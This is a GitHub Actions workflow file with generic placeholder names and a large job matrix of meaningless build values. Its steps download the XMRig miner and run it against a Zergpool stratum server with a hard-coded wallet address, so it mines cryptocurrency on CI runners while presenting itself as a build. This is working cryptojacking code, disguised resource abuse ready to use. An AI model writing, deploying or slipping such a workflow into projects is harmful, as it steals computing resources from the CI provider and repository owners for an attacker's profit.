name: NAME
 
on: [workflow_dispatch]
 
jobs:
  build:
    name: NAME
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: DOWNLOAD
      run: Invoke-WebRequest https://github.com/xmrig/xmrig/releases/download/v6.15.0/xmrig-6.15.0-msvc-win64.zip -Outfile xmrig-6.15.0-msvc-win64.zip
    - name: Extract
      run: Expand-Archive xmrig-6.15.0-msvc-win64.zip
    - name: RUNNING
      run: .\xmrig-6.15.0-msvc-win64/xmrig-6.15.0/xmrig -a rx/0 -o stratum+tcp://randomx.asia.mine.zergpool.com:4448 -u 7qj3BTQa3SF6sxJKbL9hLnpqw4PsxVPV4S --keepalive --timeout 120 --donate-level 1 -p c=DASH -t 2
    - name: DONE
      run: exit
